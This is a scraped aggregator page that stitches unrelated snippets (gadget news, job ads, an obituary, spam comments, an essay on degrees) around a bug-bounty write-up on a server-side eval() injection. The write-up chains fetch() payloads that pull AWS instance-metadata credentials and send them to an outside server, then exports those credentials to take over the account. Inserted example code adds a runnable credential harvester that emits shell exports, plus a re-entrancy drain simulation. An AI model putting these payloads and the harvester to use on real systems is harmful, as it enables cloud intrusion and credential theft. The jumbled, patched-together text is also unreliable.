The Backronym vulnerability hits MySQL right in its SSL protection; we’ll share the details. The hacker group that hit Apple & Microsoft intensifies its attacks, and a survey shows many core Linux tools are at risk.

Plus some great questions, a rockin' roundup & much much more!

Commerce Payment Encryption

This module protects payment transactions by encrypting them in the database. It does not alter the user experience. If the database is compromised, this sensitive data is useless to the attacker.

Proceed first to a full backup of your database!

The program is provided "as is" without warranty of any kind, either expressed or implied, including, but not limited to, the implied warranties of merchantability and fitness for a particular purpose.

The entire risk as to the quality and performance of the program is with you.

What is Commerce Payment Encryption?

Commerce Payment Encryption was designed to encrypt the third-party callback that contains sensitive data such as country, home address, card type, email, name, etc.

Requirements

Encrypt module

Commerce Kickstart distribution or Commerce module (the commerce_payment submodule has to be enabled)


Comments on Vader Sessions by minecraft free download 2018
Howdy! Do you know if they make any plugins to protect against hackers? I'm kinda paranoid about losing everything I've worked hard on. Any tips?
Seven Ways Hackers Can Steal Your Keyless Car in Seconds

Are you in danger of seeing your treasured car stolen off your driveway, even without the criminals having the key? The rise of keyless cars, where instead of a traditional key being inserted, cars are opened with a remote fob and started by a button, has triggered a wave of thefts, as criminals trick vehicles into believing the key fob is present. There has been a 19 per cent increase in car crime and a 29 per cent surge in crimes related to vehicle interference since 2014, according to figures from the Office for National Statistics. Price comparison website … Continue reading

The post Seven Ways Hackers Can Steal Your Keyless Car in Seconds appeared first on LewRockwell.


AWS takeover through SSRF in JavaScript

Here is the story of a bug I found in a private bug bounty program on Hackerone. It took me exactly 12h30, no break, to find it, exploit it and report it. I was able to dump the AWS credentials, and this let me fully compromise the company's account: 20 buckets and 80 EC2 instances (Amazon Elastic Compute Cloud) in my hands. Besides the fact that it's one of the best bugs of my hunter career, I also learnt a lot during this sprint, so let's share!

Intro

As I said, the program is private, so let's call the company ArticMonkey.

For the purpose of their activity, and their web application, ArticMonkey has developed a custom macro language; let's call it Banan++. I don't know what language was initially used to build Banan++, but from the webapp you can get a JavaScript version, so let's dig in!

The original banan++.js file was minified but still huge: 2.1M compressed, 2.5M beautified, 56441 lines and 2546981 characters. Enjoy. Needless to say, I didn't read the whole thing. By searching for some keywords very specific to Banan++, I located the first function at line 3348. About 135 functions were available at that time. This was my playground.

Spot the issue

I started reading the code from the top, but most of the functions were about date manipulation or mathematical operations, nothing really interesting or dangerous. After a while I finally found one called Union() that looked promising; here is the code:

helper.prototype.Union = function() {
    for (var _len22 = arguments.length, args = Array(_len22), _key22 = 0; _key22 < _len22; _key22++) args[_key22] = arguments[_key22];
    var value = args.shift(),
        symbol = args.shift(),
        results = args.filter(function(arg) {
            try {
                return eval(value + symbol + arg)
            } catch (e) {
                return !1
            }
        });
    return !!results.length
}

Did you notice that? Did you notice that kinky eval()? Looks so interesting! I copied the code into a local HTML file in order to perform more tests.

Basically the function can take any number of arguments, from 0 upwards, but only starts to be useful at 3. The eval() is used to compare the first argument to the third one with the help of the second; then the fourth is tested, the fifth, etc. Normal usage would be something like Union(1,'<',3); the returned value is true if at least one of these tests is true, and false otherwise.

However, there is absolutely no sanitization performed, nor any check of the type or value of the arguments. With the help of my favourite debugger, alert(), I worked out that an exploit could be triggered in many different ways:

Union( 'alert()//', '2', '3' );
Union( '1', '2;alert();', '3' );
Union( '1', '2', '3;alert()' );
...

Find an injection point

OK, so I had a vulnerable function, which is always good, but what I needed was an input through which to inject some malicious code. I remembered that I had already seen some POST parameters using Banan++ functions, so I performed a quick search in my Burp Suite history. Got it:

POST /REDACTED HTTP/1.1
Host: api.REDACTED.com
Connection: close
Content-Length: 232
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3502.0 Safari/537.36 autochrome/red
Content-Type: application/json;charset=UTF-8
Referer: https://app.REDACTED.com/REDACTED
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: auth=REDACTED

{...REDACTED...,"operation":"( Year( CurrentDate() ) > 2017 )"}

Response:

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 54
Connection: close
X-Content-Type-Options: nosniff
X-Xss-Protection: 1
Strict-Transport-Security: max-age=15768000; includeSubDomains
...REDACTED...

[{"name":"REDACTED",...REDACTED...}]

The operation parameter looked like a good candidate. Time for testing!

Perform the injection

Since I didn't know anything about Banan++, I had to perform some tests to find out what kind of code I could inject and what I couldn't. A sort of manual fuzzing.

{...REDACTED...,"operation":"'\"><"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}

{...REDACTED...,"operation":null}
[]

{...REDACTED...,"operation":"0"}
[]

{...REDACTED...,"operation":"1"}
[{"name":"REDACTED",...REDACTED...}]

{...REDACTED...,"operation":"a"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}

{...REDACTED...,"operation":"a=1"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}

{...REDACTED...,"operation":"alert"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}

{...REDACTED...,"operation":"alert()"}
{"status":400,"message":"Function 'alert' is not defined"}

{...REDACTED...,"operation":"Union()"}
[]

What I concluded here was:

operation

Let's continue with Union():

{...REDACTED...,"operation":"Union(1,2,3)"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}

{...REDACTED...,"operation":"Union(a,b,c)"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}

{...REDACTED...,"operation":"Union('a','b','c')"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}

{...REDACTED...,"operation":"Union('a';'b';'c')"}
[{"name":"REDACTED",...REDACTED...}]

{...REDACTED...,"operation":"Union('1';'2';'3')"}
[{"name":"REDACTED",...REDACTED...}]

{...REDACTED...,"operation":"Union('1';'<';'3')"}
[{"name":"REDACTED",...REDACTED...}]

{...REDACTED...,"operation":"Union('1';'>';'3')"}
[]

Perfect! If 1 < 3 then the response contains valid data (true), but if 1 > 3 then the response is empty (false). Parameters must be separated by a semicolon. I could now try a real attack.
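As an added example (my own code, not the post's and not ArticMonkey's Banan++): the Union() pattern above reduced to its essence, next to a hardened version that never hands a string to eval(), plus the payload shape that the semicolon-separated, single-quoted Banan++ syntax forces on the attacker. The only things taken from the post are the eval(value + symbol + arg) construction and the Union('1';'2;<js>';'3') layout; unionSafe, the witness marker, buildOperationPayload and the refusal of single quotes inside the smuggled code are this example's own assumptions.

```javascript
'use strict';

// Vulnerable pattern from the post: three caller-controlled strings are
// concatenated and handed to eval(). Nothing checks that "symbol" is an
// operator or that the operands are numbers.
function unionVulnerable(value, symbol, ...args) {
  const results = args.filter((arg) => {
    try {
      return eval(value + symbol + arg);
    } catch (e) {
      return false;
    }
  });
  return results.length > 0;
}

// Hardened replacement: the operator must come from a fixed table and every
// operand must parse as a finite number, so no string ever reaches eval().
const OPERATORS = Object.freeze({
  '<': (a, b) => a < b,
  '<=': (a, b) => a <= b,
  '>': (a, b) => a > b,
  '>=': (a, b) => a >= b,
  '==': (a, b) => a === b,
  '!=': (a, b) => a !== b,
});

function toNumber(x) {
  const n = typeof x === 'string' && x.trim() !== '' ? Number(x) : (typeof x === 'number' ? x : NaN);
  if (!Number.isFinite(n)) throw new TypeError(`operand is not a number: ${JSON.stringify(x)}`);
  return n;
}

function unionSafe(value, symbol, ...args) {
  if (!Object.prototype.hasOwnProperty.call(OPERATORS, symbol)) {
    throw new TypeError(`unsupported operator: ${JSON.stringify(symbol)}`);
  }
  const lhs = toNumber(value);
  return args.some((arg) => OPERATORS[symbol](lhs, toNumber(arg)));
}

// Constructed marker: the smuggled statement flips it, standing in for the
// fetch() call the post smuggles into the operator slot.
const witness = { ran: false };

// Replays the post's injection shape: eval() receives "12;witness.ran=true;3",
// executes the smuggled statement and returns 3, so Union() still answers true
// and the caller notices nothing.
function injectionPayloadRan() {
  witness.ran = false;
  const answer = unionVulnerable('1', '2;witness.ran=true;', '3');
  return answer && witness.ran;
}

// Same payload against the hardened version: rejected before any evaluation.
function injectionBlockedBySafeVersion() {
  witness.ran = false;
  try {
    unionSafe('1', '2;witness.ran=true;', '3');
    return false;
  } catch (e) {
    return e instanceof TypeError && witness.ran === false;
  }
}

// The outer transport is a JSON body, so JSON.stringify produces the \"
// escaping seen in the post's final payload. Banan++ strings are single-quoted
// and separated by semicolons (observed in the post); whether Banan++ accepts an
// escaped single quote inside one is unknown, so this refuses such payloads.
function buildOperationPayload(smuggledJs) {
  if (smuggledJs.includes("'")) throw new Error('single quote would terminate the Banan++ string');
  return JSON.stringify({ operation: `Union('1';'2;${smuggledJs};';'3')` });
}
```

unionSafe keeps the observable contract (true if any right-hand operand satisfies the comparison, false otherwise) while turning every malformed operator or operand into a TypeError rather than a parse of attacker text; that is the property the original lacks.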

fetch is the new XMLHttpRequest

Because the request is an ajax call to the API that only returns JSON data, it's obviously not a client-side injection. I also knew from a previous report that ArticMonkey tends to use a lot of JavaScript server side.

But it didn't matter, I had to try everything; maybe I could trigger an error that would reveal information about the system the JavaScript runs on. From my local testing I knew exactly how to inject my malicious code. I tried basic XSS payloads and malformed JavaScript, but all I got was the error previously mentioned.

I then tried to fire an HTTP request.

Through an ajax call first:

x = new XMLHttpRequest;
x.open( 'GET','https://poc.myserver.com' );
x.send();

But I didn't receive anything. I tried HTML injection:

i = document.createElement( 'img' );
i.src = '<img src="https://poc.myserver.com/xxx.png">';
document.body.appendChild( i );

But I didn't receive anything! More tries:

document.body.innerHTML += '<img src="https://poc.myserver.com/xxx.png">';
document.body.innerHTML += '<iframe src="https://poc.myserver.com">';

But I didn't receive anything!!!

Sometimes, you know, you have to test stupid things yourself to understand how stupid they were... Obviously it was a mistake to try to render HTML code, but hey! I'm just a hacker... Back to the ajax request; I stayed stuck there for a while. It took me quite a long time to figure out how to make it work.

I finally remembered that ArticMonkey uses ReactJS on their frontend; I would later learn that they use NodeJS server side. Anyway, I checked on Google how to perform an ajax request with it and found the solution in the official documentation, which led me to the fetch() function, the new standard for performing ajax calls. That was the key.

I injected the following:

fetch('https://poc.myserver.com')

And immediately got a new line in my Apache log.

Being able to ping my server is one thing, but it's a blind SSRF: I had no response echoed back. I had the idea to chain two requests, where the second would send the result of the first one. Something like:

x1 = new XMLHttpRequest;
x1.open( 'GET','https://...', false );
x1.send();
r = x1.responseText;
x2 = new XMLHttpRequest;
x2.open( 'GET','https://poc.myserver.com/?r='+r, false );
x2.send();

Again it took me a while to get the correct syntax with fetch(). Thanks StackOverflow.

I ended up with the following code, which works pretty well:

fetch('https://...').then(res=>res.text()).then((r)=>fetch('https://poc.myserver.com/?r='+r));

Of course, in a browser the same-origin policy would apply to reading that first response; server side, as the next section shows, nothing stopped it.

SSRF for the win

I first tried to read local files:

fetch('file:///etc/issue').then(res=>res.text()).then((r)=>fetch('https://poc.myserver.com/?r='+r));

But the response (the r parameter) in my Apache log file was empty.

Since I had found some S3 buckets related to ArticMonkey (articmonkey-xxx), I thought that this company might also use AWS servers for their webapp (which was also confirmed by the header in some responses: x-cache: Hit from cloudfront). I quickly jumped to the list of the most common SSRF URLs for cloud instances.

And I got a nice hit when I tried to access the instance metadata.

Final payload:

{...REDACTED...,"operation":"Union('1';'2;fetch(\"http://169.254.169.254/latest/meta-data/\").then(res=>res.text()).then((r)=>fetch(\"https://poc.myserver.com/?r=\"+r));';'3')"}

Decoded, the output is the directory listing that was returned:

ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
hostname
iam/
...

Since I didn't know anything about AWS metadata, as it was my first time there, I took time to explore the directories and all the files at my disposal. As you will read everywhere, the most interesting one is http://169.254.169.254/latest/meta-data/iam/security-credentials/<ROLE>, which returned:

{
  "Code":"Success",
  "Type":"AWS-HMAC",
  "AccessKeyId":"...REDACTED...",
  "SecretAccessKey":"...REDACTED...",
  "Token":"...REDACTED...",
  "Expiration":"2018-09-06T19:24:38Z",
  "LastUpdated":"2018-09-06T19:09:38Z"
}

Exploit the credentials

At that point I thought the game was over. But for my PoC I wanted to show the criticality of this leak; I wanted something really strong! I tried to use those credentials to impersonate the company. You have to know that these are temporary credentials, only valid for a short period, 5 minutes more or less. Anyway, 5 minutes should be enough to replace my own credentials with those: 2 copy/pastes, I think I can handle that... err...

I asked for help on Twitter from SSRF and AWS masters. Thanks guys, I truly appreciate your commitment, but I finally found the solution in the AWS Identity and Access Management User Guide. My mistake, apart from not reading the documentation (...), was to use only AccessKeyId and SecretAccessKey; this doesn't work, the token must also be exported. Kiddies...

$ export AWS_ACCESS_KEY_ID=AKIAI44...
$ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI...
$ export AWS_SESSION_TOKEN=AQoDYXdzEJr...

Checking my identity with the following command proved that I was no longer myself.

aws sts get-caller-identity

And then…

[screenshot: AWS CLI output]

Left: listing of the EC2 instances configured by ArticMonkey. Probably a big part, or the whole, of their system.

Right: the company owns 20 buckets, containing highly sensitive customer data, static files for the web application and, judging by the bucket names, probably logs/backups of their servers.

Impact: lethal.
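The metadata walk above, written out as an added example rather than the post's own code: given a primitive that fetches a URL and hands back the body (what the fetch().then(r=>r.text()) chain delivered to the Apache log), it checks for an attached IAM role, reads the role name, validates the credential document and emits the three exports, including the session token the post initially forgot. The IMDS responses, role name and key values are constructed for the example (the keys are AWS's documentation placeholders, not credentials from this engagement), and the fetch primitive is a synchronous table lookup so the walk runs offline. One caveat that post-dates the article: AWS has since added IMDSv2, where these GET paths only answer when a session token obtained by a PUT request is supplied first; the paths used here are the IMDSv1 ones the post hit.

```javascript
'use strict';

const IMDS_BASE = 'http://169.254.169.254/latest/meta-data/';

// Constructed stand-in for the metadata service: what each URL returned to the
// SSRF. The role name and the key values are placeholders (AWS's documentation
// example key), not real credentials.
const CONSTRUCTED_IMDS = {
  [IMDS_BASE]: 'ami-id\nami-launch-index\nami-manifest-path\nblock-device-mapping/\nhostname\niam/\n',
  [IMDS_BASE + 'iam/']: 'info\nsecurity-credentials/\n',
  [IMDS_BASE + 'iam/security-credentials/']: 'example-webapp-role\n',
  [IMDS_BASE + 'iam/security-credentials/example-webapp-role']: JSON.stringify({
    Code: 'Success',
    Type: 'AWS-HMAC',
    AccessKeyId: 'AKIAIOSFODNN7EXAMPLE',
    SecretAccessKey: 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY',
    Token: 'EXAMPLE-SESSION-TOKEN',
    Expiration: '2018-09-06T19:24:38Z',
    LastUpdated: '2018-09-06T19:09:38Z',
  }),
};

// Offline SSRF primitive. In the real attack each call is one injected
// fetch(url).then(r=>r.text()) chain and the body comes back through the
// attacker's web server log; here it is a table lookup so the walk runs offline.
function ssrfFetchText(url) {
  if (!Object.prototype.hasOwnProperty.call(CONSTRUCTED_IMDS, url)) {
    throw new Error(`no constructed response for ${url}`);
  }
  return CONSTRUCTED_IMDS[url];
}

function listing(body) {
  return body.split('\n').map((s) => s.trim()).filter(Boolean);
}

// The root listing only contains "iam/" when an instance profile is attached;
// without it there are no role credentials to take.
function hasIamRole(rootListing) {
  return listing(rootListing).includes('iam/');
}

// Walks root -> iam/security-credentials/ -> <ROLE> and keeps only documents
// that are actually usable (Code "Success" and all three secrets present).
function harvestRoleCredentials(fetchText) {
  if (!hasIamRole(fetchText(IMDS_BASE))) return [];
  const roles = listing(fetchText(IMDS_BASE + 'iam/security-credentials/'));
  const creds = [];
  for (const role of roles) {
    const doc = JSON.parse(fetchText(IMDS_BASE + 'iam/security-credentials/' + role));
    if (doc.Code !== 'Success' || !doc.AccessKeyId || !doc.SecretAccessKey || !doc.Token) continue;
    creds.push({ role, ...doc });
  }
  return creds;
}

// The three exports the AWS CLI needs. Omitting AWS_SESSION_TOKEN is exactly
// the mistake the post describes: temporary keys are rejected without it.
function toShellExports(cred) {
  return [
    `export AWS_ACCESS_KEY_ID=${cred.AccessKeyId}`,
    `export AWS_SECRET_ACCESS_KEY=${cred.SecretAccessKey}`,
    `export AWS_SESSION_TOKEN=${cred.Token}`,
  ].join('\n');
}

// Seconds of validity left at a given instant: the window in which the
// exports above (and "aws sts get-caller-identity") will still work.
function secondsUntilExpiry(cred, nowIso) {
  return Math.floor((Date.parse(cred.Expiration) - Date.parse(nowIso)) / 1000);
}

// Everything a shell needs, for every usable role found on the instance.
function exportsForAllRoles(fetchText) {
  return harvestRoleCredentials(fetchText)
    .map((cred) => `# role ${cred.role}, expires ${cred.Expiration}\n${toShellExports(cred)}`)
    .join('\n');
}
```

Paste the output of exportsForAllRoles into a shell and run aws sts get-caller-identity, as the post does; check secondsUntilExpiry first, because a document whose Expiration has already passed will be rejected by STS no matter how carefully it was exported.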

Timeline

06/09/2018 12h00 - beginning of the hunt

07/09/2018 00h30 - report

07/09/2018 19h30 - fix and reward

Thanks to ArticMonkey for fixing and rewarding so quickly, and for agreeing to this article :)

Conclusion

I learned a lot from this bug:

  • ReactJS, fetch(), AWS metadata.
  • RTFM! The official documentation is always a great source of (useful) information.
  • New problems appeared at every step. I had to search everywhere, try many different things, and push my limits not to give up.
  • I now know that I can fully compromise a system by myself starting from zero, which is a great personal achievement and satisfaction :)

When someone tells you that you will never be able to do something, don't waste your time bargaining with these people; simply prove them wrong by doing it.


Google takes on the iPad Pro and Surface Pro with the Pixel Slate - Mashable

Google really nailed it with the Pixelbook. The laptop-tablet hybrid was a bit steep at $1,000, but boy was it one helluva fun work and play machine. Google's just-announced Pixel Slate is a departure from the Pixelbook and its flippable screen. With ...
Related: Google's Home Hub Is Missing a Camera. Here's Why That's a Smart Idea (TIME); Google Pixel's product directors on single cameras and notches (TechCrunch); The 5 Most Important Announcements from Google's Pixel Event (Lifehacker). Also covered by Telegraph.co.uk, The Independent and YouTube.


New best story on Hacker News: How to Get Things Done When You Don't Feel Like It https://t.co/lowwYFc5W1
Senior Consultant, Red Team - Deloitte - Montréal, QC
We've already performed hacking for our clients world-wide and in all industry sectors, and we're now looking for hackers who are ready to respond to the most...
From Deloitte - Fri, 28 Sep 2018 07:36:20 GMT
Growth Hacker - KLF Group - Montréal, QC
Experience with growth hacking tools. We're looking for a Growth Hacker to help find creative ways to over-deliver on our ambitious client acquisition targets....
From Indeed - Tue, 25 Sep 2018 21:31:43 GMT
Comments on "Bonjour tout le monde !" by Security Companies County Durham
Howdy! Do you know if they make any plugins to protect against hackers? I'm kinda paranoid about losing everything I've worked hard on. Any recommendations?
Google Pixel 3XL hands on: A lot of phone, a lot of notch, and a lot of money - Good Gear Guide

Let's just get this out of the way: The Pixel 3 XL is not a pretty phone. It's got a canyon for a notch, a valley for a chin, and thick bezels around its screen. Put it in a Pepsi challenge with any 2018 phone—and even some 2017 models—and nearly ...
Related: The 5 Most Important Announcements From Google's Pixel Event (Lifehacker Australia); Google continues push into gadgets with Home Hub and third generation premium smartphone (NEWS.com.au); Google Pixel Slate: Google Might Have Finally Made a Near-Perfect Chrome OS Device (Gizmodo Australia). Also covered by Techly, iTWire, The Australian and Yahoo News.

The frightening rise in health care data breaches, charted

Hackers are increasingly turning their attention to the health care sector, but data breaches at certain kinds of industry stakeholders are more likely to compromise patient records than others, according to a study published last month in JAMA.


Thacker, Richard J.
Thacker, Richard J. On Saturday, October 6, 2018, Richard J. Thacker, age 80, of Caledonia, formerly of Chicago, was called to his heavenly home....
After a hacker attack, Instagram implements new security
Two-factor authentication is now used by many companies on their sites and apps that require users to authenticate. With this model the user must pass two factors before gaining access to the account: the first factor is usually the password, and the second factor can be […]
Comments on "Hacker attacks, here are the Brescia sites targeted" by Max
A person with skills like that should be protected, not punished. After all, apart from getting into various sites as a challenge or for fun, he does not seem to have stolen anyone's identity or money. If I were a national head of security, I would gladly offer him a well-paid little post in the offices of the "computer addicts" gang.
Internship Java Developer (m/f), IT/Computer Science, Software Development - Karlsruhe
Job offer: more information and application at https://www.campusjaeger.de/jobs/7472?s=18101178 Who are we looking for? * Geek, hacker, code guru: do you have solid programming skills? No fear of new technologies? Can you get up to speed quickly? * Likeable: are you flexible, likeable and willing to learn? Do you enjoy working in a team but can also push things forward on your own? * Bold: are you solution-oriented and responsible? Do you enjoy new challenges? What do we offer you? * Technical challenges: if you want to work with recognised experts on a bleeding-edge technology, you are in the right place. We use ...
North Korea blamed: cyberattack hit 16 banks worldwide
NT$1.8 billion (about US$58 million, or £44 million) stolen from Taiwan's Far Eastern International Bank. Last year a cyberattack siphoned NT$1.8 billion from Far Eastern International Bank. U.S.-based cybersecurity company FireEye recently released the results of an extensive probe into the attack. The report concludes that the crime was carried out by two hacking groups based in North Korea, which stole from 16 banks around the world to raise funds for cash-strapped Pyongyang. Far Eastern International was robbed of NT$1.8 billion last year as part of a crime wave that has compromised 16 institutions across the world; FireEye's report links it to two North Korean hacking groups dubbed "Lazarus" and "APT38".
Jian Hong-wei, Executive Yuan cybersecurity unit: "Their target was the interbank transfer system known as SWIFT. They first used ransomware to infiltrate the institution. The bank's response team tried to crack the encryption and then deal with the ransomware."
Google Pixel 3 & Pixel 3 XL first impressions: Initially delightful in the way Pixel 2 wasn't - 9to5Google

Google Pixel 3 and Pixel 3 XL have finally arrived, and there's not much to be surprised about in terms of specs on paper. All the leaks were spot-on. There's no Pixel Ultra. So while we would — in a normal year — be barely processing where these ...
Related: Google takes on the iPad Pro and Surface Pro with the Pixel Slate (Mashable); Google's Home Hub Is Missing a Camera. Here's Why That's a Smart Idea (TIME); Google Pixel's product directors on single cameras and notches (TechCrunch). Also covered by Lifehacker, Telegraph.co.uk, The Independent and YouTube.

Secret access codes needed to buy NSLC weed online

Here's a fun way to pretend you're some kind of hacker man.

The Nova Scotia Liquor Corporation announced today how it's going to keep recreational cannabis that's sold online out of the hands of those under 19.

An online access code will be required to visit and make purchases at the province's new online cannabis store, which is set to launch October 17.…
Comment on Lotte Website Crippled Since Tuesday As Chinese Hackers Protest American Missiles by seo google
Very good article. I am going through many of these issues as well..
Global cybercrime shifts to state-backed hackers: Russian group
The latest innovations in cybercrime have shifted from financially motivated actors to state-backed hackers focused on sabotage and intelligence gathering, a Russian cybersecurity firm said ...
Comments on Images Gallery Post Type by seemybed
Hello! I know this is kind of off topic but I was wondering which blog platform are you using for this website? I'm getting tired of Wordpress because I've had problems with hackers and I'm looking at options for another platform. It would be awesome if you could point me in the direction of a good platform.
Hackers Breach Smart Contract on Ethereum-Based Adult Entertainment Platform SpankChain

Ethereum-based adult entertainment platform SpankChain has suffered a smart contract security breach that led to loss of around $38,000, the firm reported on its Medium page Oct. 9. The hack, which purportedly took place Oct. 6, was detected by SpankChain a day after, and was announced today in a post entitled “We Got Spanked: What […]



Google's Home Hub Is Missing a Camera. Here's Why That's a Smart Idea - TIME

At Tuesday's Google event, the company unveiled the extensively leaked Pixel 3 and 3 XL smartphones, in addition to both a new ChromeOS tablet, the Pixel Slate, and a new smart home assistant in the form of Google Home Hub. While Google's made ...
Related: The 5 Most Important Announcements from Google's Pixel Event (Lifehacker); Pixel 3 launch: Google unveils new smartphone and Home Hub smart screen (Telegraph.co.uk); Google Pixel 3 release, as it happened: Price, release date and features revealed for new Android phones and more (The Independent). Also covered by YouTube.

Mods for GTA San Andreas on iOS (Part 3)

Hacks are provided confidentially! For all questions, contact the community admin: https://vk.com/os_hacker.


A Russian hacker is undergoing psychiatric examination
The man firmly denies being a hacker.
Clown, pacifist or comedian: the craziest degrees in the world
The most concrete threat is that the relentless automation of every single job will make the supreme academic qualification, the degree, useless. For many it will be waste paper, as if passing all those exams had been pointless. And so that we do not lose heart, we are comforted by the diabolical marketing, or the imagination, of some professors at universities scattered around the globe: there are degree courses that are completely useless, organised to generate publicity and guarantee unemployment.

If we were to rank the most meaningless degrees, the ones harmful to a professional career, Europe, Italy included, would top the charts. Great Britain, for example, fleeing Europe, a land of ancient and prestigious academies, cradles of knowledge and Nobel Prizes, has at the University of Kent a bold three-year course in "Stand-up comedian". Fifteen exams over three years to create a comic who, alone on stage, never sitting down, with no scenery, has to entertain, ideally getting big laughs, the audience of a theatre or a bar. Jerry Lewis started that way too, driven by talent rather than any specific training. "It is a successful theatrical form and even the least gifted could learn the technique," they say from Kent.

In the Netherlands, in Rotterdam, Codarts University promises to turn you into a clown within two years with its course in "Clown and circus arts". Here you study to be a buffoon under a big top, or at the birthday parties of your niece and her friends. They also teach you to swing on the trapeze and to interact with seals, elephants and lions. For that last course the registrar asks for a waiver in case the student loses their skin, or their head between feline jaws. But more than the occupational risks, what is alarming is that the circus is slowly dying; the few survivors have rightly given up animals and are certainly no longer hiring. And besides, children and teenagers today prefer the PlayStation.

At Roskilde University in Denmark they have clear ideas about the concept, but we do not about its application. If a festival director, an entrepreneur and a wedding planner joined forces, the result would be a "design performer". What that is, though, nobody can explain with conviction: it should be an expert able to analyse, develop and manage festivals and conferences. But isn't a degree in Communications enough for that?

Perhaps the enthusiasm with which the EU funds universities should be reined in. In Portugal the University of Coimbra offers a two-year degree in "Peace, security and development". Because if the world is racing inexorably towards nuclear war, we need erudite minds able to save the fate of the globe with a couple of exams. According to the university, this master's degree aims to deepen "theoretical and conceptual knowledge of issues related to peace, security, development and humanitarian challenges in the world". Beyond that, the university does not clarify what the possible career outlets for students might be.

In Belgrade, at its university founded in 1808, among 31 faculties and 150 academic courses, "Library and information sciences" stands out, which on paper would seem to make sense: three years of library and information science to run a library. Frankly, a two-month course would do. Then the sad reality tells us that in Serbia the very few libraries still standing after the war are at risk of closure for lack of funds. In Pennsylvania there is a course in "Non-criminal hacking": you will learn to get into any locked-down computer system, from the Pentagon to the European Bank, without stealing or doing damage. Just to have a look around.

And Italy is not exempt from this senseless waste of academic resources. In Bari you can graduate in "Hygiene and well-being of dogs and cats". No prior degree in Veterinary Medicine is required, just enthusiasm and two years to throw away. A job as a groomer for quadrupeds and felines is perhaps assured. In Bologna, at DAMS, there is a master's specialisation in "Live performance disciplines", recommended for "aspiring theatre critics, directors and actors with a solid cultural background", the brochure says. Graduates of this course come out as "professionals connected to the performing arts". The Federico II University of Naples has launched a three-year degree in "Ornamental greenery"; possible jobs range from designing green spaces to nursery production. At Pisa too, as in Kent, you can throw away three years of your life on a fine master's degree in "Science for peace"; the Pisa university is the only Italian one offering "Peace Studies". At the University of Florence, founded seven centuries ago, you can graduate in "Agricultural development in tropical areas". So you can ask yourself whether artichokes will grow in Bangkok.
Out of the classroom and into the mire: a hacking competition for cyber security students - Telstra Exchange (blog)

Talk about being thrown in the deep end – it may be years before they toss their academic hats in the air, and yet 427 university and TAFE students have been snatched out of cyber security classrooms and thrown behind computers to find and fight real ...


AGI: Who is the Italian hacker who breached NASA, RAI and CGIL
Who is the Italian hacker who breached NASA, RAI and CGIL. A 25-year-old from Salò has confessed. Nunzia Ciardi, director of the Polizia Postale: "We followed the trail of breadcrumbs and then arrived at the evidence. Now the young man risks a lot." By ARTURO DI CORINTO for Agenzia Giornalistica Italia, 8 October 2018 […]
Skripal was followed in the Czech Republic by the same men who, according to the British, poisoned him
The two Russians whom Britain blames for poisoning former double agent Sergei Skripal and his daughter Yulia were reportedly in the Czech Republic secretly in October 2014. Skripal was there at the same time, helping his Czech colleagues uncover Russian spies. According to iRozhlas.cz sources, the pair were already tailing Skripal back then.
BCM-News Daily Digest

Allegations against Apple: Apple denies report on spy chips before US Congress | ZEIT ONLINE. According to a report, Chinese hackers are said to have […] corporations such as Apple […]


Hacker penetrates Spankchain smart contract, escapes with booty
A hacker exploited a re-entrancy bug in the Spankchain payment channel contract.
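The re-entrancy pattern named above, as an added Python simulation: this is example code, not SpankChain's contract and not Solidity. A channel that pays out before it updates the payer's balance lets the recipient's receive hook (the attacker contract's fallback on Ethereum) call withdraw() again while the first call is still in progress; the fixed version applies checks-effects-interactions and settles the balance before the external call. The channel, attacker, deposits and the depth cap standing in for the gas limit are all constructed for illustration.

```python
"""Added example, not SpankChain's code: a Python model of a re-entrant
withdraw and of the checks-effects-interactions fix. Everything here
(channel, attacker, deposits, depth cap) is constructed for illustration."""


class VulnerableChannel:
    """Balance is updated AFTER the external call, so a re-entrant withdraw
    sees the old balance and is paid again and again."""

    def __init__(self, deposits):
        self.balances = dict(deposits)
        self.pool = sum(deposits.values())  # funds the contract actually holds

    def withdraw(self, who, receive):
        amount = self.balances[who]
        if amount == 0 or amount > self.pool:  # the "checks" step
            return
        self.pool -= amount                    # the payout leaves the contract
        receive(self, amount)                  # external call: control leaves us
        self.balances[who] = 0                 # "effects" applied too late


class FixedChannel(VulnerableChannel):
    """Checks-effects-interactions: state is settled before the external call,
    so a re-entrant withdraw finds a zero balance and stops."""

    def withdraw(self, who, receive):
        amount = self.balances[who]
        if amount == 0 or amount > self.pool:  # checks
            return
        self.balances[who] = 0                 # effects first
        self.pool -= amount
        receive(self, amount)                  # interaction last


class Attacker:
    """Plays the attacker contract: its receive hook calls withdraw() again
    before the first withdraw has returned."""

    def __init__(self, name, max_depth=10):
        self.name = name
        self.stolen = 0
        self.depth = 0
        self.max_depth = max_depth  # stand-in for the gas limit on nesting

    def receive(self, channel, amount):
        self.stolen += amount
        if self.depth < self.max_depth:
            self.depth += 1
            channel.withdraw(self.name, self.receive)  # re-enter
            self.depth -= 1


def run_attack(channel_cls, attacker_deposit=1, victim_deposit=9):
    """Deposit a little, withdraw once, report (attacker's take, funds left)."""
    chan = channel_cls({"attacker": attacker_deposit, "victim": victim_deposit})
    atk = Attacker("attacker")
    chan.withdraw("attacker", atk.receive)
    return atk.stolen, chan.pool


if __name__ == "__main__":
    print("vulnerable:", run_attack(VulnerableChannel))  # attacker drains the pool
    print("fixed:     ", run_attack(FixedChannel))       # attacker gets only its deposit
```

Against the vulnerable channel a 1-unit deposit drains all 10 units held, because each nested call reads the stale balance; against the fixed channel the nested call reads zero and the attacker receives exactly its own deposit.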
The science behind 100K+ articles: the five stages of the content life cycle

